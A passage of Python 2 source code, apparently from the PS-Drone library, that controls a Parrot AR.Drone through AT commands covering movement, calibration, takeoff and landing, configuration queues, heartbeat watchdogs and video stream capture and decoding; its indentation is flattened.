self.setConfig("custom:session_id", self.__ConfigSessionID)
except: return (self.__ConfigSessionID)
def setConfigUserID(self, *args):
try:
value = float(args[0])
self.__ConfigUserID = normalLen8(value)
self.setConfig("custom:profile_id", self.__ConfigUserID)
except: return (self.__ConfigUserID)
def setConfigApplicationID(self, *args):
try:
value = float(args[0])
self.__ConfigApplicationID = normalLen8(value)
self.setConfig("custom:application_id", self.__ConfigApplicationID)
except: return (self.__ConfigApplicationID)
def setConfigAllID(self):
self.setConfig("custom:session_id", self.__ConfigSessionID)
self.setConfig("custom:profile_id", self.__ConfigUserID)
self.setConfig("custom:application_id", self.__ConfigApplicationID)
# Reminds the drone which IDs it has to use (important for e.g. switch cameras)
def sendConfigIDs(self):
self.at("CONFIG_IDS", [self.__ConfigSessionID,self.__ConfigUserID,self.__ConfigApplicationID])
###### Calibration
def trim(self):
self.at("FTRIM", [])
def mtrim(self):
self.at("CALIB", [0])
def mantrim(self, thetaAngle, phiAngle, yawAngle): # manual Trim
if self.valueCorrection:
try: thetaAngle = float(thetaAngle)
except: thetaAngle = 0.0
try: phiAngle = float(phiAngle)
except: phiAngle = 0.0
try: yawAngle = float(yawAngle)
except: yawAngle = 0.0
self.at("MTRIM", [thetaAngle,phiAngle,yawAngle]) # floats
def getSelfRotation(self, wait):
if self.valueCorrection:
try: wait = float(wait)
except: wait = 1.0
reftime = time.time()
oangle = self.__NavData["demo"][2][2] # detects the self-rotation-speed of the yaw-sensor
time.sleep(wait)
self.selfRotation = (self.__NavData["demo"][2][2]-oangle)/(time.time()-reftime)
return self.selfRotation
###### Movement
# Default speed of movement
def setSpeed(self, *speed):
try: self.__speed = self.__checkSpeedValue(*speed)
except: pass
return self.__speed
# Absolute movement in x, y and z-direction and rotation
def move(self, leftright, backwardforward, downup, turnleftright): # Absolute movement in x, y and z-direction and rotation
if self.valueCorrection:
try: leftright = float(leftright)
except: leftright = 0.0
try: backwardforward = float(backwardforward)
except: backwardforward = 0.0
try: downup = float(downup)
except: downup = 0.0
try: turnleftright = float(turnleftright)
except: turnleftright = 0.0
if leftright > 1.0: leftright = 1.0
if leftright < -1.0: leftright = -1.0
if backwardforward > 1.0: backwardforward = 1.0
if backwardforward < -1.0: backwardforward = -1.0
if downup > 1.0: downup = 1.0
if downup < -1.0: downup = -1.0
if turnleftright > 1.0: turnleftright = 1.0
if turnleftright < -1.0: turnleftright = -1.0
self.at("PCMD", [3 ,leftright, -backwardforward, downup, turnleftright])
# Relative movement to controller in x, y and z-direction and rotation
def relMove(self, leftright, backwardforward, downup, turnleftright, eastwest, northturnawayaccuracy):
if self.valueCorrection:
try: leftright = float(leftright)
except: leftright = 0.0
try: backwardforward = float(backwardforward)
except: backwardforward = 0.0
try: downup = float(downup)
except: downup = 0.0
try: turnleftright = float(turnleftright)
except: turnleftright = 0.0
if leftright > 1.0: leftright = 1.0
if leftright < -1.0: leftright = -1.0
if backwardforward > 1.0: backwardforward = 1.0
if backwardforward < -1.0: backwardforward = -1.0
if downup > 1.0: downup = 1.0
if downup < -1.0: downup = -1.0
if turnleftright > 1.0: turnleftright = 1.0
if turnleftright < -1.0: turnleftright = -1.0
self.at("PCMD_MAG", [1 ,leftright, -backwardforward, downup, turnleftright, eastwest, northturnawayaccuracy])
# Stop moving
def hover(self):
self.at("PCMD", [0,0.0,0.0,0.0,0.0])
def stop(self): # Hammertime !
self.hover()
# Basic movements
def moveLeft(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(-self.__checkSpeedValue(speed),0.0,0.0,0.0)
def moveRight(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move( self.__checkSpeedValue(speed),0.0,0.0,0.0)
def moveForward(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0, self.__checkSpeedValue(speed),0.0,0.0)
def moveBackward(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,-self.__checkSpeedValue(speed),0.0,0.0)
def moveUp(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0, self.__checkSpeedValue(speed),0.0)
def moveDown(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0,-self.__checkSpeedValue(speed),0.0)
def turnLeft(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0,0.0,-self.__checkSpeedValue(speed))
def turnRight(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0,0.0, self.__checkSpeedValue(speed))
# Lets the drone rotate defined angle
# BUG: does not work with 180deg. turns
# ToDo: Should be able to stop in case of failures
def turnAngle(self,ndir,speed,*args):
opos = self.__NavData["demo"][2][2] # get the source/current (original) angle
npos = opos+ndir # calculate the destination (new) angle
minaxis = opos # to make sure, that the jump from -180 to 180 will...
maxaxis = opos # ...be correctly handled
speed = self.__checkSpeedValue(speed)
ospeed = speed # stores the given speed-value
reftime = time.time()
accurateness = 0
try: accurateness = args[0]
except: pass
if accurateness<=0:
accurateness = 0.005 # Destination angle can differ +/- this value (not demo-mode)
if self.__State[10]: accurateness = 0.1 # Destination angle can differ +/- this value in demo-mode
stop = False
while not stop:
ndc = self.__NavDataCount # wait for the next NavData-package
while ndc == self.__NavDataCount: time.sleep(0.001)
kalib = (time.time()-reftime)*self.selfRotation # trys to recalibrate, causing moving sensor-values around 0.0185 deg/sec
cpos = self.__NavData["demo"][2][2] # get the current angle
if minaxis > cpos: minaxis = cpos # set the minimal seen angle
if maxaxis < cpos: maxaxis = cpos # set the maximal seen angle
if cpos-minaxis >= 180: cpos = cpos-360 # correct the angle-value if necessary...
elif maxaxis-cpos >= 180: cpos = cpos+360 # ...for an easier calculation
speed = abs(cpos-npos+kalib) / 10.0 # the closer to the destination the slower the drone turns
if speed > ospeed: speed = ospeed # do not turn faster than recommended
if speed < 0.05: speed = 0.05 # too slow turns causes complications with calibration
self.__speed = speed
if cpos > (npos+kalib): self.turnLeft() # turn left, if destination angle is lower
else: self.turnRight() # turn right if destination angle is higher
if cpos < (npos+kalib+accurateness) and cpos > (npos+kalib-accurateness):# if angle is reached...
self.stop() # ...stop turning
time.sleep(0.01)
stop = True
return(True)
def takeoff(self):
self.at("REF", [290718208]) #290718208=10001010101000000001000000000
def land(self):
self.at("REF", [290717696]) #290717696=10001010101000000000000000000
###### NavData commands
# Switches to Demo- or Full-NavData-mode
def useDemoMode(self,value):
if value: self.setConfig("general:navdata_demo", "TRUE")
else: self.setConfig("general:navdata_demo", "FALSE")
def useMDemoMode(self,value):
if value: self.setMConfig("general:navdata_demo", "TRUE")
else: self.setMConfig("general:navdata_demo", "FALSE")
def getNDpackage(self,packets):
self.__NavData_pipe.send(("send",packets))
def addNDpackage(self,packets):
self.__NavData_pipe.send(("add",packets))
def delNDpackage(self,packets):
self.__NavData_pipe.send(("block",packets))
def reconnectNavData(self):
self.__NavData_pipe.send("reconnect")
###### Video & Marker commands
# This makes the drone fly around and follow 2D tags which the camera is able to detect.
def aflight(self, flag):
self.at("AFLIGHT", [flag]) #Integer: 1: start flight, 0: stop flight
def slowVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("slowVideo")
else: self.__Video_pipe.send("fastVideo")
def midVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("midVideo")
else: self.__Video_pipe.send("fastVideo")
def fastVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("fastVideo")
else: self.__Video_pipe.send("slowVideo")
def saveVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("saveVideo")
else: self.__Video_pipe.send("unsaveVideo")
def startVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("init")
else: self.stopVideo()
def stopVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("uninit")
else: self.startVideo()
def showVideo(self, *args):
try: do = args[0]
except: do = True
if do:
self.__Video_pipe.send("init")
self.__Video_pipe.send("show")
else: self.hideVideo()
def hideVideo(self, *args):
try: do = args[0]
except: do = True
if do:
self.__Video_pipe.send("init")
self.__Video_pipe.send("hide")
else: self.showVideo()
# Selects which video stream to send on the video UDP port.
def hdVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_codec","131")
else: self.setMConfig("video:video_codec","129")
def sdVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_codec","129")
else: self.setMConfig("video:video_codec","131")
def mp4Video(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_codec","128")
else: self.setMConfig("video:video_codec","129")
# Selects which video-framerate (in frames per second) to send on the video UDP port.
def videoFPS(self, fps):
try:
int(fps)
if fps>60: fps = 60
elif fps<1: fps = 1
self.setMConfig("video:codec_fps",fps)
except: pass
# Selects which video-bitrate (in kilobit per second) to send on the video UDP port.
def videoBitrate(self, bitrate):
try:
int(bitrate)
if bitrate > 20000: bitrate = 20000
if bitrate < 250: bitrate = 250
self.setMConfig("video:bitrate",bitrate)
except: pass
# Selects which video stream to send on the video UDP port.
def frontCam(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_channel","0")
else: self.setMConfig("video:video_channel","1")
def groundCam(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_channel","1")
else: self.setMConfig("video:video_channel","0")
### Misc commands
def reset(self):
if self.NavDataCount>0 and self.State[31]==1:
self.at("REF", [290717952]) #290717952=10001010101000000000100000000
def thrust(self, fl, fr, rl, rr): # Controls engines directly, overriding control loops.
fl *= 2
if fl > 64000: fl = 64000
elif fl < 0: fl = 0
fr *= 2
if fr > 64000: fr = 64000
elif fr < 0: fr = 0
rl *= 2
if rl > 64000: rl = 64000
elif rl < 0: rl = 0
rr *= 2
if rr > 64000: rr = 64000
elif rr < 0: rr = 0
self.at("PWM", [int(fl), int(fr), int(rr), int(rl)])
# Seems that integer-values could be between 0 (stop) to 511 (full); more than 511 seem to have no effect.
# Beware: if using too high values (e.g. floats (>64k ?)), there will be side-effects like restarting other motors, etc.
# Drone will shut down, if its flight-angle is more than set.
# Control the drone's LED.
def led(self, animation, frequency, duration):
if animation < 21 and frequency > 0 and duration >= 0:
self.at("LED", [animation, float(frequency), duration])
# Makes the drone execute a predefined movement (animation).
def anim(self, animation, duration):
if animation < 20 and duration >= 0:
self.at("ANIM", [animation, duration])
#########################=-
### Low-level Commands ###=-
#########################=-
# Upgrading the basic drone commands to low-level drone commands:vid
# Adding command-number, checking the values, convert 32-bit float to 32-bit integer and put it in quotes
def at(self, command, params):
self.__lock.acquire()
paramLn = ""
if params:
for p in params:
if type(p) == int: paramLn += ","+str(p)
elif type(p) == float: paramLn += ","+str(struct.unpack("i", struct.pack("f", p))[0])
elif type(p) == str: paramLn += ",\""+p+"\""
msg = "AT*"+command+"="+str(self.__CmdCounter)+paramLn+"\r"
self.__CmdCounter += 1
self.__sendrawmsg(msg)
self.__lock.release()
# Sending the low-level drone-readable commands to the drone...better do not use
def __sendrawmsg(self, msg):
try: self.__keepalive.cancel()
except: pass
if self.showCommands:
if msg.count("COMWDG") < 1: print msg
self.__sock.sendto(msg, (self.DroneIP, self.CmdPort))
self.__keepalive = threading.Timer(0.1, self.__heartbeat)
self.__keepalive.start()
#############################=-
### Convenient Commands ###=-
#############################=-
# Just add water
# Checks the battery-status
def getBattery(self):
batStatus = "OK"
batValue = 0
if self.__State[15] == 1: batStatus = "empty"
try: batValue = self.__NavData['demo'][1]
except: batValue = -1
return (batValue,batStatus) # Percent & status ("OK", "empty")
# Calculates the minor difference between two angles as the drone gives values from -180 to 180...
# ...so e.g. 170 and -160 are +30 difference and drone will turn to the correct direction
def angleDiff(self, base, value):
adiff = ((base+180)-(value+180)) %360
if adiff>180: adiff-=360
return adiff
# Grabs the pressed key (not yet for Windows)
# ToDo: Reprogram for Windows
def getKey(self):
key = ""
fd = sys.stdin.fileno()
if os.name == 'posix':
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
try:
try: key = sys.stdin.read(1)
except IOError: pass
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
if os.name == 'nt':
if msvcrt.kbhit(): key = msvcrt.getch()
key += self.__vKey
self.__vKey = ""
return key
# Drone hops like an excited dog
def doggyHop(self):
ospeed = self.__speed
self.__speed = 1
for i in range (0,4,1):
self.moveUp()
time.sleep(0.20)
self.moveDown()
time.sleep(0.20)
self.hover()
self.__speed = ospeed
# Drone wags like a happy dog
def doggyWag(self):
ospeed = self.__speed
self.__speed = 1
for i in range (0,4,1):
self.moveLeft()
time.sleep(0.25)
self.moveRight()
time.sleep(0.25)
self.hover()
self.__speed = ospeed
# Drone nods
def doggyNod(self):
ospeed = self.__speed
self.__speed = 1
for i in range (0,4,1):
self.moveForward()
time.sleep(0.25)
self.moveBackward()
time.sleep(0.25)
self.hover()
self.__speed = ospeed
def printDefault(self, *args):
if os.name == 'posix':
print self.__pDefaultStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printRed(self, *args):
if os.name == 'posix':
print self.__pRedStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printGreen(self, *args):
if os.name == 'posix':
print self.__pGreenStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printYellow(self, *args):
if os.name == 'posix':
print self.__pYellowStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printBlue(self, *args):
if os.name == 'posix':
print self.__pBlueStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printPurple(self, *args):
if os.name == 'posix':
print self.__pPurpleStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printLineUp(self):
if os.name == 'posix': print self.__pLineUpStr,
##################################=-
### Threads & Thread-Sidekicks ###=-
##################################=-
# Idea: the network thread listens to the given network-stream and communication-pipes of other processes, such as for video or navdata-decoding.
# In case the connection to the drone is cut off for more than 2 seconds (so no keep-alive-command has been sent) the network
# needs to reconnect. In order to do so the (private) function "__netrecon" starts after 0.1 seconds of no incoming navdata-datapacket to
# reconnect all given network-sockets.
def __heartbeat(self):
# If the drone does not get a command, it will mutter after 50ms (CTRL watchdog / state[28] will set to 1)
# and panic after 2 seconds and abort data-communication on port 5554 (then you have to initialize the network again).
# Heartbeat will reset the watchdog and, by the way, the ACK_BIT (state[6], to accept any other AT*CONFIG command)
# If mainthread isn't alive anymore (because program crashed or whatever), heartbeat will initiate the shutdown.
if str(threading.enumerate()).count("MainThread, stopped") or str(threading.enumerate()).count("MainThread")==0: self.shutdown()
else: self.at("COMWDG",[])
# CheckAndReact is periodically called by the receiveData-Thread to check for mainly for critical status-error(s) and
# changed debug-modes.
def __checkAndReact(self, debug, showCommands):
# Automatic process-commands, used for syncing debugging-bits to child-processes
if debug != self.debug:
debug = self.debug
if debug:
self.__NavData_pipe.send("debug")
self.__Video_pipe.send("debug")
else:
self.__NavData_pipe.send("undebug")
self.__Video_pipe.send("undebug")
if showCommands != self.showCommands:
showCommands = self.showCommands
if showCommands:
self.__NavData_pipe.send("showCommands")
self.__Video_pipe.send("showCommands")
else:
self.__NavData_pipe.send("hideCommands")
self.__Video_pipe.send("hideCommands")
# Communication problem, shutting down
if self.stopOnComLoss and self.__State[30]:
self.shutdown()
sys.exit()
return (debug,showCommands)
# Thread for sending the configuration. It is asynchronous but save.
# The configuration-requests are in a queue, the first entry is sent. NavData will contain a "Control command ACK" status-bit,...
# ...that configuration is ready to be set. This will be confirmed and the procedure waits until this bit is 0 again; then the next entry will be processed.
# In savemode, there is a check whether the configuration has been changed correctly by requesting the current/latest configuration and double-checking this value.
def __sendConfig(self):
sleeptime, getconfigtag, self.__sendConfigRunning = 0.001, False, True
while not self.__networksuicide:
if len(self.__ConfigQueue): # If there is something in the queue...
if self.__ConfigQueue[0][-1]: self.sendConfigIDs() # ...check for multiuserconfig-request (and send it)
self.__ConfigSending = True # Set tag, to show sending is in process
qlen = len(self.__ConfigQueue)
if qlen > 1: # Testing for double entries, preventing a ping-pong in save-mode
i = 1
while True:
if i >= qlen: break
if self.__ConfigQueue[0][0].lower() == self.__ConfigQueue[i][0].lower():
self.__ConfigQueue.remove(self.__ConfigQueue[0])# Delete double entries
qlen = len(self.__ConfigQueue)
else: i+=1
self.at("CONFIG",self.__ConfigQueue[0][:-1]) # Send the first entry in queue
getconfigtag, configconfirmed, configreconfirmed = False, False, False
while not configconfirmed and not self.__networksuicide: # Wait for confirmation-bit from drone...
if self.__State[6] and not configreconfirmed and not self.__networksuicide:
self.at("CTRL",[5,0]) # ...and send reset the confirmation-bit
configreconfirmed = True
if not self.__State[6] and configreconfirmed and not self.__networksuicide:
configconfirmed = True # Wait for the reset of the confirmation-bit
time.sleep(sleeptime)
# It seems that the drone stores configurations not always correctly; therfore, here is a save-mode:
if self.sendConfigSaveMode and not self.__networksuicide:
lastConfigDataCount = self.__ConfigDataCount # Wait for the next configuration-list
self.getConfig()
while lastConfigDataCount == self.__ConfigDataCount and not self.__networksuicide: time.sleep(sleeptime)
# New & Optimized
for i in range (0,len(self.__ConfigData),1):
if self.__ConfigData[i][0].find(self.__ConfigQueue[0][0]) > -1:
if self.__ConfigData[i][1] != self.__ConfigQueue[0][1]:
if self.debug:
print " Configuration missmatched, resending !"
print " "+self.__ConfigData[i][0]+" should be \""+self.__ConfigQueue[0][1]+"\" is \""+self.__ConfigData[i][1]+"\""
self.__ConfigQueue.append(self.__ConfigQueue[0]) # If value is not correctly set, requeue !
self.__ConfigQueue.remove(self.__ConfigQueue[0]) # Configuration has been (correctly) set, delete request from queue and go on
if self.__networksuicide: self.__ConfigQueue=[]
if not len(self.__ConfigQueue):
if not getconfigtag:
self.getConfig()
getconfigtag = True
self.__ConfigSending = False
else: time.sleep(sleeptime)
if self.debug: print "sendConfig-Tread : committed suicide"
def __receiveData(self):
self.__net_pipes=[]
self.__net_pipes.append(self.__NavData_pipe)
self.__net_pipes.append(self.__Video_pipe)
self.__Config_pipe = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #TCP
self.__Config_pipe.setblocking(0)
self.__Config_pipe.connect_ex((self.DroneIP, self.CTLPort))
self.__net_pipes.append(self.__Config_pipe)
VideoIsDead, configdata, cfgdata, cmd = False, [], "", ""
vDecodeRunning, debug, showCommands, self.__receiveDataRunning = False, False, False, True
while not self.__networksuicide:
in_pipe, dummy1, dummy2 = select.select(self.__net_pipes, [], [], 0.1) # When something is in a pipe...
for ip in in_pipe: # ...go and get it
if ip == self.__NavData_pipe: ### Receiving sensor-values from NavData-process
self.__NavData, self.__State, self.__NavDataCount, self.__NavDataTimeStamp, self.__NavDataDecodingTime, self.__NoNavData = self.__NavData_pipe.recv()
if ip == self.__vdecode_pipe: ### Receiving imagedata and feedback from videodecode-process
cmd, VideoImageCount, VideoImage, VideoDecodeTime = self.__vdecode_pipe.recv() # Imagedata
if self.showCommands and cmd!="Image" : print "** vDec -> Com :",cmd
if cmd == "suicided": self.__Video_pipe.send("vd died") # videodecode-process died
if cmd == "foundCodec": self.__Video_pipe.send("foundCodec") # the codec of the videostream has been found, do not flood anymore
if cmd == "VideoUp": self.__VideoReady = True # Imagedata is available
if cmd == "keypressed": self.__vKey = VideoImage # Pressed key on window
if cmd == "reset": self.__Video_pipe.send(cmd) # proxy to videodecode-process
if cmd == "Image": # Imagedata !
self.__VideoImageCount = VideoImageCount
self.__VideoImage = VideoImage
self.__VideoDecodeTime = VideoDecodeTime
self.__VideoDecodeTimeStamp = time.time()-self.__startTime
if ip == self.__Video_pipe: ### Receiving feedback from videostream-process
cmd = self.__Video_pipe.recv()
if self.showCommands and cmd != "": print "** Vid -> Com : ",cmd
if cmd == "vDecProc": # videodecode-process should start
if not vDecodeRunning:
try:
if self.__vDecodeProcess == True: pass
except: self.__vDecodeProcess = multiprocessing.Process( target=vDecode, args=(self.__VidPipePath,self.__vdecodeChild_pipe,os.getpid()))
self.__vDecodeProcess.start()
self.__net_pipes.append(self.__vdecode_pipe)
self.__vDecodeRunning = True
self.__Video_pipe.send("vDecProcON")
# else: self.__vdecode_pipe.send(cmd) # If / elif / else is somehow not working here...whyever
if cmd == "VideoDown": self.__VideoReady=False # videodecode-process stopped
if cmd == "saveVideo": self.__SaveVideo=True # no preprocessing of the video
if cmd == "unsaveVideo": self.__SaveVideo=False # preprocessing activated again
if cmd == "debug": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "showCommands": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "hideCommands": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "show": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "hide": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "vDecProcKill":
self.__vdecode_pipe.send("die!") # videodecode-process should switch off
vDecodeRunning = False
if ip==self.__Config_pipe and not self.__networksuicide: ### Receiving drone-configuration
try:
if self.__networksuicide: break # Does not stop sometimes, so the loop will be forced to stop
cfgdata = cfgdata+self.__Config_pipe.recv(65535) # Data comes in two or three packages
if cfgdata.count("\x00"): # Last byte of sent config-file, everything was received
if self.__networksuicide: break
configdata = (cfgdata.split("\n")) # Split the huge package into a configuration-list
for i in range(0, len(configdata), 1):
configdata[i] = configdata[i].split(" = ") # Split the single configuration-lines into configuration and value
self.__ConfigData = configdata[:-1] # Last value is "\x00"
self.__ConfigDataTimeStamp = time.time()-self.__startTime # Set a timestamp for a better coordination
self.__ConfigDataCount+=1 # Alters the count of received Configdata for a better coordination
configdata, cfgdata = [], ""
if self.showCommands: print "Got "+str(len(self.__ConfigData))+" Configdata "+str(time.time()-self.__calltime)
self.__calltime=0
except IOError: pass
debug, showCommands = self.__checkAndReact(debug, showCommands) # Check for errors and things to change
if self.debug: print "receiveData-Thread : committed suicide"
def __stopnetwork(self):
self.__networksuicide = True
#############################=-
### Compatibility Commands ###=-
#############################=-
# While programming this API I changed some command-names
# This section converts the old commands into the new ones
def pwm(self, fl, fr, rl, rr): # Controls engines directly, overriding control loops.
if fl > 64000: fl = 64000
if fr > 64000: fr = 64000
if rl > 64000: rl = 64000
if rr > 64000: rr = 64000
self.at("PWM", [int(fl), int(fr), int(rr), int(rl)])
def groundVideo(self, *args): self.groundCam(*args)
def frontVideo(self, *args): self.frontCam(*args)
###############################################################################
### Internal Subfunctions
###############################################################################
def __checkSpeedValue(self,value):
try:
speed = float(value)
if self.valueCorrection:
speed = max(-1.0,speed)
speed = min( 1.0,speed)
except: speed = self.__speed
return speed
# Checks the inputs for the right length
def normalLen8(value):
value, zero = str(value), "00000000"
vlen = min(len(value),8)
normal = zero[0:8-vlen] + value[0:8]
return normal[0:8].lower()
##################################################################################################
###### Receive and Decode Video ######
##################################################################################################
# If the ps_drone-process has crashed, recognize it and kill yourself
def watchdogV(parentPID, ownPID):
global commitsuicideV
while not commitsuicideV:
time.sleep(1)
try : os.getpgid(parentPID)
except:
try: subprocess.Popen(["kill",str(os.getpid())],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
except: pass
# Thread to capture, decode and display the video-stream
def vCapture(VidPipePath, parent_pipe):
import cv2
global vCruns, commitsuicideV, showVid, lockV, debugV
# cv2.startWindowThread()
show = False
hide = True
vCruns = True
t = time.time()
parent_pipe.send(("VideoUp",0,0,0))
capture = cv2.VideoCapture(VidPipePath)
ImgCount = 0
if debugV: print "CAPTURE: "+str(time.time()-t)
time.sleep(0.1)
parent_pipe.send(("foundCodec",0,0,0))
declag = time.time()
count = -3
imageXsize = 0
imageYsize = 0
windowName = "PS-Drone"
codecOK = False
lastKey = ""
cc=0
'''
while not commitsuicideV:
decTimeRev = time.time()
receiveWatchdog = threading.Timer(2.0, VideoReceiveWatchdog, [parent_pipe,"vCapture", debugV]) # Resets video if something hangs
receiveWatchdog.start()
success, image = capture.read()
##################################
#img_process(image)
cc+=1
receiveWatchdog.cancel()
decTime = decTimeRev-time.time()
tlag = time.time()-declag
if not codecOK:
if image.shape[:2]==(360,640) or image.shape[:2]==(368,640) or image.shape[:2]==(720,1280) or image.shape[:2]==(1080,1920):
codecOK = True
if debugV: print "Codec seems OK"
else:
if debugV: print "Codec failure"
parent_pipe.send(("reset",0,0,0))
commitsuicideV = True
if codecOK:
if not (imageXsize == image.shape[1]) or not (imageYsize == image.shape[0]):
cv2.destroyAllWindows()
imageYsize, imageXsize = image.shape[:2]
windowName = "PS-Drone - "+str(imageXsize)+"x"+str(imageYsize)
if success:
if tlag > 0.02: count+=1
if count > 0:
ImgCount+=1
if not show and not hide:
cv2.destroyAllWindows()
hide = True
if show:
cv2.imshow(windowName, image)
key=cv2.waitKey(1)
if key>-1: parent_pipe.send(("keypressed",0,chr(key%256),0))
parent_pipe.send(("Image",ImgCount,image,decTime))
else: time.sleep(0.01)
declag = time.time()
if showVid:
if not show:
show=True
cv2.destroyAllWindows()
else:
if show:
show=False
cv2.destroyAllWindows()
vCruns = False
cv2.destroyAllWindows()
capture.release()
if debugV: print "vCapture-Thread : committed suicide"
'''
### Process to decode the videostream in the FIFO-Pipe, stored there from main-loop.
# Storing and decoding must not be processed in the same process, thats why decoding is external.
# vDecode controls the vCapture-thread which captures and decodes finally the videostream.
def vDecode(VidPipePath, parent_pipe, parentPID):
global vCruns, commitsuicideV, showVid, lockV, debugV
showCommands = False
Thread_vCapture = threading.Thread(target=vCapture, args=(VidPipePath,parent_pipe))
Thread_vCapture.start()
Thread_watchdogV = threading.Thread(target=watchdogV, args=[parentPID,os.getpid()])
Thread_watchdogV.start()
while not commitsuicideV:
in_pipe, out_pipe, dummy2 = select.select([parent_pipe], [], [], 0.1) # When something is in a pipe...
cmd = parent_pipe.recv()
if showCommands: print "** Com -> vDec : ",cmd
if cmd == "die!": commitsuicideV = True
elif cmd == "reset": commitsuicideV = True
elif cmd == "show": showVid = True
elif cmd == "hide": showVid = False
elif cmd == "debug":
debugV = True
print "vDecode-Process : running"
if vCruns: print "vCapture-Thread : running"
elif cmd == "undebug": debugV = False
elif cmd == "showCommands": showCommands = True
elif cmd == "hideCommands": showCommands = False
Thread_vCapture.join()
parent_pipe.send(("suicided",0,0,0))
time.sleep(0.1)
if debugV: print "vDecode-Process : committed suicide"
#####################################################
def VideoReceiveWatchdog(parent_pipe,name, debugV):
if debugV: print "WHATCHDOG reset von",name
parent_pipe.send(("reset",0,0,0))
def mainloopV(DroneIP, VideoPort, VidPipePath, parent_pipe, parentPID):
inited, preinited, suicide, debugV, showCommands, slowVideo = False, False, 0, False, False, False
rawVideoFrame, VidStreamSnippet, VidStreamSnippetAvalible, iFrame, FrameCount = "", "", False, False, 0
saveVideo, unsureMode, searchCodecTime, frameRepeat, burstFrameCount = False, True, 0, 1, 0
reset, resetCount, commitsuicideV, foundCodec = False, 0, False, False
vstream_pipe, pipes = None, [parent_pipe]
vdecode_pipe, vdecode_childpipe = multiprocessing.Pipe()
pipes.append(vdecode_pipe)
Thread_watchdogV = threading.Thread(target=watchdogV, args=[parentPID,os.getpid()])
Thread_watchdogV.start()
while not commitsuicideV:
in_pipe, out_pipe, dummy2 = select.select(pipes, [], [], 0.1) # When something is in a pipe...
for ip in in_pipe:
if ip == parent_pipe:
cmd = parent_pipe.recv()
if showCommands: print "** Com -> Vid : ",cmd
if cmd == "die!":
if inited:
suicide = True
parent_pipe.send("vDecProcKill")
dummy = 0
else: commitsuicideV = True
elif cmd == "foundCodec": foundCodec = True
elif cmd == "reset" and not reset:# and resetCount<3:
inited, preinited, foundCodec = False, False, False
rawVideoFrame, VidStreamSnippet = "", ""
VidStreamSnippetAvalible = False
iFrame, FrameCount, reset = False, 0, True
unsureMode, searchCodecTime = True, 0
burstFrameCount = 0
resetCount += 1
parent_pipe.send("vDecProcKill")
elif cmd == "slowVideo":
slowVideo = True
frameRepeat = 1
elif cmd == "midVideo":
slowVideo = True
frameRepeat = 4
elif cmd == "fastVideo":
slowVideo = False
frameRepeat = 1
elif cmd == "saveVideo":
saveVideo = True
parent_pipe.send("saveVideo")
elif cmd == "unsaveVideo":
saveVideo = False
parent_pipe.send("unsaveVideo")
elif cmd == "showCommands":
showCommands = True
parent_pipe.send("showCommands")
elif cmd == "hideCommands":
showCommands = False
parent_pipe.send("hideCommands")
elif cmd == "debug":
debugV = True
print "Video-Process : running"
parent_pipe.send("debug")
elif cmd == "undebug":
debugV = False
parent_pipe.send("undebug")
elif cmd == "init" and not inited and not preinited:
preinited = True
try: os.mkfifo(VidPipePath)
except: pass
parent_pipe.send("vDecProc")
elif cmd == "vDecProcON":
rawVideoFrame = ""
VidStreamSnippet = ""
iFrame = False
FrameCount = 0
foundCodec = False
searchCodecTime = 0
if not vstream_pipe:
vstream_pipe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
vstream_pipe.setblocking(0)
vstream_pipe.connect_ex((DroneIP,VideoPort))
pipes.append(vstream_pipe)
write2pipe = open(VidPipePath,"w+")
suicide = False
inited = True
preinited = False
unsureMode = True
elif cmd == "uninit" and inited:
parent_pipe.send("vDecProcKill")
elif cmd == "vd died":
if inited and not reset:
pipes.remove(vstream_pipe)
vstream_pipe.shutdown(socket.SHUT_RDWR)
vstream_pipe.close()
write2pipe.close()
inited = False
if suicide: commitsuicideV = True
parent_pipe.send("VideoDown")
try: os.remove(VidPipePath)
except: pass
if not inited and reset:
try: os.mkfifo(VidPipePath)
except: pass
parent_pipe.send("VideoDown")
parent_pipe.send("vDecProc")
parent_pipe.send("debug")
